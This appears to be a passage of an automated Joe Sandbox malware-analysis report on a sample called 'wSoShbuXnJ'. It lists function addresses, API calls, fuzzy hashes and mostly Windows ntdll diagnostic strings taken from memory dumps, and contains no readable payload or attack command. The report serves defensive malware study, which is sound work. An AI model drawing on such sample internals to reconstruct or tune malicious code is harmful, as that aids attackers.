                                                              • API ID: FreeHeap
                                                              • String ID: neA
                                                              • API String ID: 3298025750-2757349852
                                                              • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction ID: 9121e88aff0d49045895fe5efa263953fc4bc90d71136d3efce1da578365df1c
                                                              • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction Fuzzy Hash: 45E092B22042147BD610EF59EC41E9B37ADEFC8710F004419FE09A7242C771B9108BB4
                                                              Function 0042CA53 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 532 42ca53-42ca91 call 404583 call 42d943 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E604,?,?,00000000,?,0041E604,?,?,?), ref: 0042CA8C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction ID: 2033942cd3b101f58bf4d77c2136ec80b735e96d56796e01d22862b954715158
                                                              • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction Fuzzy Hash: 7CE06DB12442047BDA10EE59EC42E9B37ADDFC4710F004419FA08A7241DA71B95087B4
                                                              Function 0042CAD3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,53EC9B57,?,?,53EC9B57), ref: 0042CB07
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                              • Instruction ID: 4f7d0579f0d3a644c73c2585b10cf1452984b28a7a8af53eb300c7de9d046712
                                                              • Opcode Fuzzy Hash: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                              • Instruction Fuzzy Hash: CBE046722002147BC620AA6AEC05F9BB76CDBC5724F00441AFB0CAB282DA75BA0187A4
                                                              Function 01512C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                              • Instruction ID: 5c3d6b71e6925bc8e1553948165ea8800bf553775c93212eb37b81c4e41e2c7b
                                                              • Opcode Fuzzy Hash: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                              • Instruction Fuzzy Hash: DAB09B739015D5D6EA12E7A4460971B794077D1715F29C461D3030A45F4778C1D1E275

                                                              Non-executed Functions

                                                              Function 01552349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                              • Instruction ID: 2b4d3c7abe67a87184204e65ecb610cb21cbc106c77bf539cb21be563db15a04
                                                              • Opcode Fuzzy Hash: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                              • Instruction Fuzzy Hash: 1A928E71608342EFE761CF29C890B6BB7E8BB84754F14481EFA95DB261D770E844CB92
                                                              Function 01508620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • 8, xrefs: 015452E3
                                                              • Thread identifier, xrefs: 0154553A
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0154540A, 01545496, 01545519
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454CE
                                                              • undeleted critical section in freed memory, xrefs: 0154542B
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01545543
                                                              • Critical section debug info address, xrefs: 0154541F, 0154552E
                                                              • Critical section address, xrefs: 01545425, 015454BC, 01545534
                                                              • Invalid debug info address of this critical section, xrefs: 015454B6
                                                              • corrupted critical section, xrefs: 015454C2
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454E2
                                                              • double initialized or corrupted critical section, xrefs: 01545508
                                                              • Critical section address., xrefs: 01545502
                                                              • Address of the debug info found in the active list., xrefs: 015454AE, 015454FA
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: d82d780b04a8e09e1f18f1da6a9b3a6a430f48c7696d7b5a2c8019aa76093e4e
                                                              • Instruction ID: 5f34bc8b700b5a792d0c50778f25463c40f39126f440fecc71fdf520166f023f
                                                              • Opcode Fuzzy Hash: d82d780b04a8e09e1f18f1da6a9b3a6a430f48c7696d7b5a2c8019aa76093e4e
                                                              • Instruction Fuzzy Hash: 71818FB0A41349EFDB61CF99C885BEEBBF9BB08714F20411AF505BB250D375A945CB60
                                                              Function 015029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0154261F
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01542412
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015422E4
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01542498
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01542624
                                                              • @, xrefs: 0154259B
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01542602
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01542409
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015424C0
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015425EB
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01542506
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: c5523077acb33f3c3c36a083b245cbc2c7bae3c0c213f3369d92342cceddc4cc
                                                              • Instruction ID: 97fe3236e3c4571f094845e808a80188c94754b3e6097ac87f5fbe79dba17f51
                                                              • Opcode Fuzzy Hash: c5523077acb33f3c3c36a083b245cbc2c7bae3c0c213f3369d92342cceddc4cc
                                                              • Instruction Fuzzy Hash: 780250F1D002299BDB22DB54CD84BEDB7B8BF54314F4045DAE609AB281DB709E84CF69
                                                              Function 01578B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: ab8a40378fb0f01a9389abb25d174497791a4953ff942e1d1309a099682d72f0
                                                              • Instruction ID: b3f5a48c1bd1139a56b09a0724b73b8bbeee87ace86ec0c6d16e73deb9de9ca3
                                                              • Opcode Fuzzy Hash: ab8a40378fb0f01a9389abb25d174497791a4953ff942e1d1309a099682d72f0
                                                              • Instruction Fuzzy Hash: 1151D2716143029BD335CF18D84ABABBBECFF94640F55491EE959CB250E770D504C792
                                                              Function 01580274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 569e304b1296e326b79807d87f41d2740698a3d6792572f60ec757d7632d9470
                                                              • Instruction ID: 9f13fd31d3f9924556f2e5785e2f810c44dd5efbac0bc6c5ad9af34b254a982f
                                                              • Opcode Fuzzy Hash: 569e304b1296e326b79807d87f41d2740698a3d6792572f60ec757d7632d9470
                                                              • Instruction Fuzzy Hash: 52D1FE35600682DFDB22EF69C451AADBBF1FF59714F19804EF445AF2A2C7349949CB20
                                                              Function 015589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • VerifierDebug, xrefs: 01558CA5
                                                              • HandleTraces, xrefs: 01558C8F
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01558B8F
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01558A3D
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01558A67
                                                              • VerifierDlls, xrefs: 01558CBD
                                                              • VerifierFlags, xrefs: 01558C50
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 87a90cd74e95de4b85a7197702c298f18137c99edb0a8b1faf8d1915c13643fc
                                                              • Instruction ID: 796c9380a979ea89552a5cda7d2afec1fdd6365c899dfbf47e3d98cc1afc5178
                                                              • Opcode Fuzzy Hash: 87a90cd74e95de4b85a7197702c298f18137c99edb0a8b1faf8d1915c13643fc
                                                              • Instruction Fuzzy Hash: E8911671601B02DFD761DFAAC8A0B5A77E9BB94B14F45041EFE416F251E770AC04C791
                                                              Function 014DEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: 3a075b17c6ae53054d6fcfe21a5f3f3a7779ed2a23cf778c5a9a99aa0d6ed8a3
                                                              • Instruction ID: 789607575035adf6f891f272a9f29b483b803c3d2bd739fee0b2f92dcee3c044
                                                              • Opcode Fuzzy Hash: 3a075b17c6ae53054d6fcfe21a5f3f3a7779ed2a23cf778c5a9a99aa0d6ed8a3
                                                              • Instruction Fuzzy Hash: B3A21D74A0562A8BDF75CF19C8987ADBBB5BF85304F1442EAD50DAB260DB309E85CF40
                                                              Function 015063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 898a25ad3723594508a1155ebff48efd9fa0d949b78d30ea30d309193413efe7
                                                              • Instruction ID: fac1644ee7235e42a6e2a7ed0288b89adc6bca5d2f9d274c1cf2c3328e6f5a32
                                                              • Opcode Fuzzy Hash: 898a25ad3723594508a1155ebff48efd9fa0d949b78d30ea30d309193413efe7
                                                              • Instruction Fuzzy Hash: 5A913470B407169FEB26DF98D889BAE7BE1BF50B18F16012DE9106F2D1D7B09901C7A1
                                                              Function 014C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • apphelp.dll, xrefs: 014C6496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01529A2A
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01529A01
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01529A11, 01529A3A
                                                              • LdrpInitShimEngine, xrefs: 015299F4, 01529A07, 01529A30
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015299ED
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 2e7becd326a52228d86b32a75eb17b58854f6657e9809f4fa8eeaee9cbb94c2a
                                                              • Instruction ID: 2719f325f447bcf910dda5550b79f2288b12ce0d0d99624dc3e058892d2f2b43
                                                              • Opcode Fuzzy Hash: 2e7becd326a52228d86b32a75eb17b58854f6657e9809f4fa8eeaee9cbb94c2a
                                                              • Instruction Fuzzy Hash: D55113712083119FE720DF25D885FAB77E8FB94A48F11491EF5959B2B0D770E904CB92
                                                              Function 01502674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01542178
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01542180
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015421BF
                                                              • SXS: %s() passed the empty activation context, xrefs: 01542165
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0154219F
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01542160, 0154219A, 015421BA
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: b52baf12fba3c3cfed544601a6417d3a3bafe37fa4107337d7fa84f81810c802
                                                              • Instruction ID: 187c1f1321039db3c85c79cb05e1d15d38c62d64c6ad7e343c1606bb83ae4cd1
                                                              • Opcode Fuzzy Hash: b52baf12fba3c3cfed544601a6417d3a3bafe37fa4107337d7fa84f81810c802
                                                              • Instruction Fuzzy Hash: E5312836F4022577F7228ADA9C85F9F7B78FBE4A94F05005ABA04BF191D6709A00C7A1
                                                              Function 0150C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01548170
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0150C6C3
                                                              • LdrpInitializeProcess, xrefs: 0150C6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01548181, 015481F5
                                                              • LdrpInitializeImportRedirection, xrefs: 01548177, 015481EB
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015481E5
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: d83e51c99f8b08b7ce5d1325506c07b9e574ac25e1982ba1545be5d63748e8b5
                                                              • Instruction ID: e1cdd8b17fee4c71cbd09c37b96a31a5fe284dab0cab587d2b4c9c52e739ff20
                                                              • Opcode Fuzzy Hash: d83e51c99f8b08b7ce5d1325506c07b9e574ac25e1982ba1545be5d63748e8b5
                                                              • Instruction Fuzzy Hash: 89310271A447069FC220EF6ADD46E1AB7E4FFA4B14F02065DF9416F2A1E670EC04C7A2
                                                              Function 0151096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 01512DF0: LdrInitializeThunk.NTDLL ref: 01512DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D74
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: 5cb319fcf019c4aeaca8eee263344544f87bdd91b5b47c056e3c1cb37f3d9a66
                                                              • Instruction ID: 1fe59d3bfab6e8a35efd98d1591dcc1b16fbfd9abe1a1eda72727af21630ed97
                                                              • Opcode Fuzzy Hash: 5cb319fcf019c4aeaca8eee263344544f87bdd91b5b47c056e3c1cb37f3d9a66
                                                              • Instruction Fuzzy Hash: B7427C75900716DFEB21CF28C881BAAB7F5BF48304F1485AAE989DF245D770A984CF60
                                                              Function 014E29A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-3126994380
                                                              • Opcode ID: 8138c9c06ca2795d4bf53003934a167a3c3b551c614c44ad1eb3c72059f13742
                                                              • Instruction ID: 594d5a9e464e4ba581c2c1c45c82b53ce2497e76d030c604d7e43c4b6f961801
                                                              • Opcode Fuzzy Hash: 8138c9c06ca2795d4bf53003934a167a3c3b551c614c44ad1eb3c72059f13742
                                                              • Instruction Fuzzy Hash: 5D92DF71A042499FDB26CF68C448BAEBBF1FF48311F18805EE859AB361D775A942CF50
                                                              Function 014DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 8ff0a480ec8f6233d5dbd6a6b11f939be5c48ee0e5bea09f151be45b019e72c5
                                                              • Instruction ID: 443ec5996224332a6bab5da28c8d447df61d72cf75289373820fc5496db76a88
                                                              • Opcode Fuzzy Hash: 8ff0a480ec8f6233d5dbd6a6b11f939be5c48ee0e5bea09f151be45b019e72c5
                                                              • Instruction Fuzzy Hash: 5BC19A74108386CFDB11CF68C164B6ABBE4BF84704F14896EF9958B361E734CA4ACB56
                                                              Function 01508402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01508421
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0150855E
                                                              • LdrpInitializeProcess, xrefs: 01508422
                                                              • @, xrefs: 01508591
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: 47adcbc2bab0befa346b847c00ac40ba3e03fc1e68a71b4dbb57575b7e4e4f7d
                                                              • Instruction ID: 4984151b59fcad5817b6716380a0acccef755ae386eed4522f2692db47034080
                                                              • Opcode Fuzzy Hash: 47adcbc2bab0befa346b847c00ac40ba3e03fc1e68a71b4dbb57575b7e4e4f7d
                                                              • Instruction Fuzzy Hash: 7B919F71918745AFE722DFA5CC41FAFBAE8BF94744F40092EF6849A191E331D904CB62
                                                              Function 0150273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 015421DE
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015421D9, 015422B1
                                                              • .Local, xrefs: 015028D8
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015422B6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 4b62286bd03b39da726100b8e5ea2d9b7d2a57cd56df16c88e4f7d736494fd57
                                                              • Instruction ID: 922e244d1e29443d9763e7ebe5fde03df874a0e7b78ec16539300332e9c6778f
                                                              • Opcode Fuzzy Hash: 4b62286bd03b39da726100b8e5ea2d9b7d2a57cd56df16c88e4f7d736494fd57
                                                              • Instruction Fuzzy Hash: 34A1C735900229DBDB25CF99DC887A9B3B5BF58354F1545EAD908AF291D7309EC0CF90
                                                              Function 01504AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01543437
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01543456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0154342A
                                                              • RtlDeactivateActivationContext, xrefs: 01543425, 01543432, 01543451
                                                              Memory Dump Source
